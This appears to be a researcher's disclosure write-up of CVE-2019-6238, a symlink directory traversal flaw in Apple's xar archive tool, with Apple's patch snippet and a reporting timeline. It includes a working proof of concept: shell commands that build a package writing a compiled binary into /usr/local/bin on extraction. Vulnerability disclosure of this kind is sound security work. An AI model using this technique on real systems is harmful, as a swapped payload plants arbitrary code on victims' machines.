CVE-2019–6238: Apple XAR directory traversal vulnerability

With the security update released in 2019, Apple fixed a directory traversal vulnerability in XAR. This vulnerability allows an attacker to write to arbitrary directories or install malware. In this way, the attacker can execute arbitrary code.

XAR aims to provide an easily extensible archive format. Important design decisions include an easily extensible XML table of contents for random access to archived files, storing the TOC at the beginning of the archive to allow for efficient handling of streamed archives, the ability to handle files of arbitrarily large sizes, the ability to choose independent encodings for individual files in the archive, the ability to store checksums for individual files in both compressed and uncompressed form, and the ability to query the table of content’s rich meta-data.

A developer or user can extract or review a *.pkg file with xar but xar doesn’t check if the directory you extracted the file from is a symlink. For trigger it:

Create a file called “Hello.c”:

// Hello.c

#include <stdio.h>

int main () {
    printf("HelloWorld\n");
    printf("\n");
    printf("Extracted! success\n");
    printf("\n");
}

Create a folder called “test_dir”, move “Hello.c” file, compile it (Hello.c), move compiled file to the folder you want to extract (for example: /usr/local/bin), create a symlink to the folder where you moved the file, add the symlink to the package and using the symlink add the file to the package in xar:

mkdir test_dir
cd test_dir
mv ../Hello.c Hello.c
clang Hello.c -o Hello
mv Hello /usr/local/bin/Hello
ln -s /usr/local/bin folder
xar -c -v -f poc.xar folder folder/Hello

Package is ready. Let’s delete the symlink and target file for test:

rm -rf folder
rm /usr/local/bin/Hello

Now, extract the package with xar:

xar -x -v -f poc.xar

You should see “Hello” file in “/usr/local/bin” path. Run “Hello” command in Terminal. You will see output:

HelloWorld

Extracted! success

Apple fixed this issue by adding a symlink check:

...  
// Sanity check if we have a symlink, that it's a valid path.
  const char* kSymlinkName = "symlink"; // Why there is no const for this I have no idea.
  if (strncmp(kSymlinkName, type, strlen(kSymlinkName)) == 0)
  {
   if (XAR_FILE(f)->children != NULL)
   {
    if (Verbose)
     printf("Warning, children of \"%s\" will not extract because it's a symlink.\n", path);

    XAR_ITER(iter)->nochild = 1; // Do no extract children of a symlink
   }
  }
...

Security advisory:

Report timeline:

7 August 2018 — Reported to Apple.

27 August 2018 — Apple started investigating.

1 October 2018 — They are working on addressing this issue.

25 March 2019 — Issue was addressed with new security update as officially.